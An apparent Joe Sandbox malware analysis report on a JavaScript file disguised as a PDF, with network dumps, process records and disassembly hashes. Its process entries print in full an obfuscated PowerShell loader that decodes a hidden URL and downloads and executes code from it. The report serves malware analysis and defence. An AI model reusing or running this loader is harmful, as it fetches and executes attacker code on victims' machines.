                                                                                                  Nov 15, 2024 18:23:51.570138931 CET1289INData Raw: 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 2e 67 62 74 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 7a 74 20 2e 67 62 74 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 6f 20
                                                                                                  Data Ascii: lative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .
                                                                                                  Nov 15, 2024 18:23:51.570440054 CET1289INData Raw: 62 74 6f 20 23 67 62 69 34 69 2c 2e 67 62 74 6f 20 23 67 62 69 34 69 64 7b 74 6f 70 3a 33 70 78 7d 2e 67 62 69 34 70 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 32 34 70 78 7d 23 67 62 69 34 69 64 7b 62 61 63 6b 67 72 6f 75 6e
                                                                                                  Data Ascii: bto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none;display:inline-block;height:48px;width:48px}#gbmpiw{display:inline-block;line-
                                                                                                  Nov 15, 2024 18:23:51.570444107 CET1289INData Raw: 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 67 62 6d 6c 62 2d 68 76 72 2c 2e 67 62 6d 6c 62 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f
                                                                                                  Data Ascii: e:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{background:#eee;cursor:pointer;outline:0 so
                                                                                                  Nov 15, 2024 18:23:51.688074112 CET1289INData Raw: 7d 2e 67 62 70 63 20 2e 67 62 70 73 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 70 63 20 2e 67 62 70 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 7d 2e 67 62 70 64 20 2e 67 62 6d 74
                                                                                                  Data Ascii: }.gbpc .gbps{color:#000;font-weight:bold}.gbpc .gbpd{margin-bottom:5px}.gbpd .gbmt,.gbpd .gbps{color:#666 !important}.gbpd .gbmt{opacity:.4;filter:alpha(opacity=40)}.gbps2{color:#666;display:block}.gbp0{display:none}.gbp0 .gbps2{font-weight:bo


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:12:23:43
                                                                                                  Start date:15/11/2024
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js"
                                                                                                  Imagebase:0x7ff60f940000
                                                                                                  File size:170'496 bytes
                                                                                                  MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:2
                                                                                                  Start time:12:23:45
                                                                                                  Start date:15/11/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
                                                                                                  Imagebase:0x7ff776db0000
                                                                                                  File size:875'008 bytes
                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:12:23:45
                                                                                                  Start date:15/11/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
                                                                                                  Imagebase:0x7ff790c40000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Executed Functions

                                                                                                    Function 00007FFCF41499F6 Relevance: .5, Instructions: 475COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 004a6b1bf1045b48a36c57368e38e82b980d54f2bb2e27ea5558a63c98e3365d
                                                                                                    • Instruction ID: 8af52d9e795b802b4358c6bdd30ee16a1b8761a638c6fd603aca02a0ccbc4e95
                                                                                                    • Opcode Fuzzy Hash: 004a6b1bf1045b48a36c57368e38e82b980d54f2bb2e27ea5558a63c98e3365d
                                                                                                    • Instruction Fuzzy Hash: 03F1A430A18A8E8FEBA8DF28C8557E977D1FF55310F04826EE85EC7291CB349945CB91
                                                                                                    Function 00007FFCF414A7A2 Relevance: .5, Instructions: 461COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 617513c5be588d036a2ac937b770bb596a7f7d894eddd3878f973911a9313e79
                                                                                                    • Instruction ID: c32288aaa9fa81461c36995694f7fd9df072d1a663faf9d7ba24d2d07356261f
                                                                                                    • Opcode Fuzzy Hash: 617513c5be588d036a2ac937b770bb596a7f7d894eddd3878f973911a9313e79
                                                                                                    • Instruction Fuzzy Hash: EAE1D330A08A4E8FEBA8DF28C8557E977D1EF55350F14826ED85EC72D1CA74A841CB91
                                                                                                    Function 00007FFCF4201650 Relevance: 13.2, Strings: 10, Instructions: 659COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6,N$(}+$(}+$H|+$H|+$H|+$H|+$H|+$J{v*$pU+
                                                                                                    • API String ID: 0-337388468
                                                                                                    • Opcode ID: 90b8e1a42412e9414ccd0959f205ef1e7e8c37b3ee38144c630733bcacdc58f1
                                                                                                    • Instruction ID: 34a7bacc5b656d117e232c2b99263d553fb56faf22e510e3ed56df0cca31e1f3
                                                                                                    • Opcode Fuzzy Hash: 90b8e1a42412e9414ccd0959f205ef1e7e8c37b3ee38144c630733bcacdc58f1
                                                                                                    • Instruction Fuzzy Hash: 2122277290DA9D4FE799DA28C8A5274BBE2EF55311B1801BEC05DC71D3DE2AAC06C321
                                                                                                    Function 00007FFCF420A8AE Relevance: 11.0, Strings: 8, Instructions: 1000COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6,N$2~v*$BNv*$Xz+$Xz+$`7K:$p!+$z@_L
                                                                                                    • API String ID: 0-3260872431
                                                                                                    • Opcode ID: e03216e223be25304c08c1059c7744aba41b593e82397233a1dfdf08225f6b49
                                                                                                    • Instruction ID: afde9c39cf66b7c1c4c01588a9f59a04c8a9128c438c7c841614262529c09b29
                                                                                                    • Opcode Fuzzy Hash: e03216e223be25304c08c1059c7744aba41b593e82397233a1dfdf08225f6b49
                                                                                                    • Instruction Fuzzy Hash: A3721522A1CA9E4FEB95E72CC8A5664B7E2EF64301F5801BDC05DC72C3DE29AC45C761
                                                                                                    Function 00007FFCF420A097 Relevance: 9.8, Strings: 7, Instructions: 1010COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6,N$2~v*$BNv*$Xz+$Xz+$`7K:$p!+
                                                                                                    • API String ID: 0-2153204993
                                                                                                    • Opcode ID: 0eed714972ea693d150d4b5d831dc23933d6ab32e84822af879ede0399b2a939
                                                                                                    • Instruction ID: 3130f5c00930b7a73a7b1ecfafa4d3390dfbe57a9a0f33b7336e7c0784683eb2
                                                                                                    • Opcode Fuzzy Hash: 0eed714972ea693d150d4b5d831dc23933d6ab32e84822af879ede0399b2a939
                                                                                                    • Instruction Fuzzy Hash: 73721322A1CA994FEB95DB2CC8A5664BBE2EF65300F5801FDC05DD71C3DE29AC45C721
                                                                                                    Function 00007FFCF4133379 Relevance: 1.6, Strings: 1, Instructions: 365COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6,N
                                                                                                    • API String ID: 0-3326779747
                                                                                                    • Opcode ID: 00020a93277d970e2ea7bd385196833ef7c0ae58e4cff97d043e078351a0c5e7
                                                                                                    • Instruction ID: 3fc65a72d9661b3bb8270e32cace1fd5a6d588e66cbee86fdd51feda66c9a188
                                                                                                    • Opcode Fuzzy Hash: 00020a93277d970e2ea7bd385196833ef7c0ae58e4cff97d043e078351a0c5e7
                                                                                                    • Instruction Fuzzy Hash: ADC15030E18A5D8FDF95DF58C494AB9BBF2FF58300F24816AD41DD7296CA24E881CB91
                                                                                                    Function 00007FFCF4411995 Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79929529209.00007FFCF4410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: X*(
                                                                                                    • API String ID: 0-4272852176
                                                                                                    • Opcode ID: 771b622448bcb19adf35f66a7809eb30d874985458cc4583806c1d61b4f1b8a2
                                                                                                    • Instruction ID: ddda11641ae2a1f37fbb71337f16e1c277995502eed94b739375822cfba14222
                                                                                                    • Opcode Fuzzy Hash: 771b622448bcb19adf35f66a7809eb30d874985458cc4583806c1d61b4f1b8a2
                                                                                                    • Instruction Fuzzy Hash: 32A15822A0DA9D4FE79A972894A5574BFD2EF8A310B1A01FFC09DC70D7ED14AC02C761
                                                                                                    Function 00007FFCF4204DCB Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: h_+
                                                                                                    • API String ID: 0-1391441272
                                                                                                    • Opcode ID: 967d1ef6d0a9cab007d02e511b84a0ca40657755e403fffd0d3c302a88c72b39
                                                                                                    • Instruction ID: 1abd0037cb3b91743548fc9c706957f31d02197f0065e499103543b7a1ce1d45
                                                                                                    • Opcode Fuzzy Hash: 967d1ef6d0a9cab007d02e511b84a0ca40657755e403fffd0d3c302a88c72b39
                                                                                                    • Instruction Fuzzy Hash: C3814572A0DA9E0FEB55EB6888A91B9BBE1EF05315F0800FED45CC70D3DA59AC45C361
                                                                                                    Function 00007FFCF420ADC3 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 2~v*
                                                                                                    • API String ID: 0-2279062986
                                                                                                    • Opcode ID: ea66f34932d82ad0c920f09309eec007206a0829d859c638bf8e253c5c37cad0
                                                                                                    • Instruction ID: b0f4e65fed78d79ad2ece2ac4f9026d019c853490dec074ba296670ff24f1acf
                                                                                                    • Opcode Fuzzy Hash: ea66f34932d82ad0c920f09309eec007206a0829d859c638bf8e253c5c37cad0
                                                                                                    • Instruction Fuzzy Hash: 4B81F122A1CA9A4FEB99E72CC8A5664B7E2EF65304F5800FDC05DC71C3DE2AAC45C751
                                                                                                    Function 00007FFCF420A593 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 2~v*
                                                                                                    • API String ID: 0-2279062986
                                                                                                    • Opcode ID: 1c56bc2eda15b82489e2ac07e7c074524d15ee6a6e198ddc88dc08ef60fe2e78
                                                                                                    • Instruction ID: 4837ea6b23c82ba25e51e99b66861dda0f04e86b1712bd02ac8c97b8c1fc2e59
                                                                                                    • Opcode Fuzzy Hash: 1c56bc2eda15b82489e2ac07e7c074524d15ee6a6e198ddc88dc08ef60fe2e78
                                                                                                    • Instruction Fuzzy Hash: F561F222A1C99A4FEB98EA2CC8A5668B7E1FF65300F5841F9C05DC72D2DD2AAC41C751
                                                                                                    Function 00007FFCF414A3B6 Relevance: .3, Instructions: 334COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4ce3ae27a8febf70a55ffe6eb420dc48eb5b6c7286954e8a5bdd864c9a770f8e
                                                                                                    • Instruction ID: 2a02ee956ba6347fd375e3128a9a6459d58b319e433a1d3e03327c14a2300a17
                                                                                                    • Opcode Fuzzy Hash: 4ce3ae27a8febf70a55ffe6eb420dc48eb5b6c7286954e8a5bdd864c9a770f8e
                                                                                                    • Instruction Fuzzy Hash: 32B1C630A0CA4D4FEB68DF28C8557E97BE1FF55350F14826EE84EC7291DA34A845CB92
                                                                                                    Function 00007FFCF41365E1 Relevance: .2, Instructions: 231COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e632a4113e47c816a25475b2275cac9675107303dbb7191379f5b100e3ff6a89
                                                                                                    • Instruction ID: 327b45e2e4b15dd33fe31122793f6ab3de13687ffc62f8f802d185af9bf606dc
                                                                                                    • Opcode Fuzzy Hash: e632a4113e47c816a25475b2275cac9675107303dbb7191379f5b100e3ff6a89
                                                                                                    • Instruction Fuzzy Hash: F8618D7091C7854FE359DB28C8A15B2BBF1EF56324B1440BED0DAC7293DA24A806C762
                                                                                                    Function 00007FFCF4143FA5 Relevance: .1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7916209dd1328641abcf0624a2f7bfdacae8ab8e119f4afd3ffd7315372b5c95
                                                                                                    • Instruction ID: 2aacbfc0fe10152dc3ad78406552c622be358462ea6f483409786a183bf07297
                                                                                                    • Opcode Fuzzy Hash: 7916209dd1328641abcf0624a2f7bfdacae8ab8e119f4afd3ffd7315372b5c95
                                                                                                    • Instruction Fuzzy Hash: E531E53191CB4C8FDB18DB5C984A6A8BBE0FB59311F00826FE049C3252CB70A856CBD2
                                                                                                    Function 00007FFCF401EB80 Relevance: .1, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79923814622.00007FFCF401D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF401D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf401d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 89c20d3d8e7f022aa63d7ac4dca3e07c80093d803ed5cf3b153e939f39727c4d
                                                                                                    • Instruction ID: 2ae81e1beafb529391d73e7ee4effe8600ae48782d39fa53860751ca8ad8f660
                                                                                                    • Opcode Fuzzy Hash: 89c20d3d8e7f022aa63d7ac4dca3e07c80093d803ed5cf3b153e939f39727c4d
                                                                                                    • Instruction Fuzzy Hash: 47412A7140DBC88FE7568B28D8959533FF0EF52224B1605DFD08ACB1E3D625A846C7A2
                                                                                                    Function 00007FFCF44119E1 Relevance: .1, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79929529209.00007FFCF4410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4410000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4410000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 32357379844eaca5e32a1e54d284c89cc39a20ce6b8081216bf9ca7d4222155d
                                                                                                    • Instruction ID: c1fc8d0e464a19faec77724c596dcfb11d20e766e15bf5e00bbc8218eb87cf81
                                                                                                    • Opcode Fuzzy Hash: 32357379844eaca5e32a1e54d284c89cc39a20ce6b8081216bf9ca7d4222155d
                                                                                                    • Instruction Fuzzy Hash: 88314822E1D96E8FE7969718D0F1134BEC2EFC8350B5A02BBC45DD71CADD14AC01DAA1
                                                                                                    Function 00007FFCF4144848 Relevance: .1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 21bee4c9b6a7d1b8ed21224c72219f29f0afb6401cf3900f61b2156610c87340
                                                                                                    • Instruction ID: 961d5b50fa32ea2d8594138856737f5061889962920472978087137b53904e0c
                                                                                                    • Opcode Fuzzy Hash: 21bee4c9b6a7d1b8ed21224c72219f29f0afb6401cf3900f61b2156610c87340
                                                                                                    • Instruction Fuzzy Hash: 2421EA3090CA4C8FEB59DF9CD8497E97BE0EB96321F04826FD049C3156D6749455CBA1
                                                                                                    Function 00007FFCF4149EB4 Relevance: .1, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 32a163f0e95f03248e45e45fe2025085eb1017930277cf36ef2fede0b289382f
                                                                                                    • Instruction ID: 1d47be99af5b83eb2435ab164e40c1a6fa6214ba6d4651c608b815260f22180d
                                                                                                    • Opcode Fuzzy Hash: 32a163f0e95f03248e45e45fe2025085eb1017930277cf36ef2fede0b289382f
                                                                                                    • Instruction Fuzzy Hash: 53310130D2865D9EFBB49F28CC557F97695FF42315F408139D41E860D2DA386945CB31
                                                                                                    Function 00007FFCF4134EE8 Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ad0cef07d659e5a53188e0b71fa1a9a1096079a16d0d8bd3bc21cf53cd66dd48
                                                                                                    • Instruction ID: eec3fc8b41693c0356c19ff22e7858f42cff43ce65f5255fd397f1052df9be6b
                                                                                                    • Opcode Fuzzy Hash: ad0cef07d659e5a53188e0b71fa1a9a1096079a16d0d8bd3bc21cf53cd66dd48
                                                                                                    • Instruction Fuzzy Hash: 8321356280D7D50FE7069B2C9861160BFA0EF03224B1881EFD0E5CE0E3C41AA88AC362
                                                                                                    Function 00007FFCF4134E75 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5dad00dda9ec2283b40f4625e59f838836cd46c2c02a3baf10a9bf0ef0fe30d6
                                                                                                    • Instruction ID: 47b4b9608747a87a660e7ba1239fe821fc324f7e0faa02461c0ac697a20a1b2e
                                                                                                    • Opcode Fuzzy Hash: 5dad00dda9ec2283b40f4625e59f838836cd46c2c02a3baf10a9bf0ef0fe30d6
                                                                                                    • Instruction Fuzzy Hash: 7701447161CB0C4FDB44EF4CE491AA5B7E0FB95324F10056EE58AC3691D636E892CB45
                                                                                                    Function 00007FFCF4144690 Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4130000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 14fb9d99497b21f7f60adee370d8cbae54dea61d564591c51fe3a1eba52ad0f3
                                                                                                    • Instruction ID: 4e3380338426ea17c660b9b848fab854fce094e5edca3490d3e5d72ec7a73a36
                                                                                                    • Opcode Fuzzy Hash: 14fb9d99497b21f7f60adee370d8cbae54dea61d564591c51fe3a1eba52ad0f3
                                                                                                    • Instruction Fuzzy Hash: F9F02B75848A8D4FDB49EF28C8595D4BFA0FF17210B0442DBD459C70F2DB649454CB92
                                                                                                    Function 00007FFCF4201300 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79925432572.00007FFCF4200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4200000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_7ffcf4200000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0b35bf0f62fc4b7a7c2b68f8e7e794ab11c9b5f188b8079580d7a16a2d9be68
                                                                                                    • Instruction ID: f67df6789bb0d8a6646a3631274e9379ad26d6882074361e321ac1729d27b570
                                                                                                    • Opcode Fuzzy Hash: a0b35bf0f62fc4b7a7c2b68f8e7e794ab11c9b5f188b8079580d7a16a2d9be68
                                                                                                    • Instruction Fuzzy Hash: C2D0121270E89D4FE798BA1C64552A9A393D7C82D6B3441FBD18DC71C5CD565C094391

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FFCF4132DD2 Relevance: 1.9, Strings: 1, Instructions: 626COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.79924610389.00007FFCF4130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4130000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
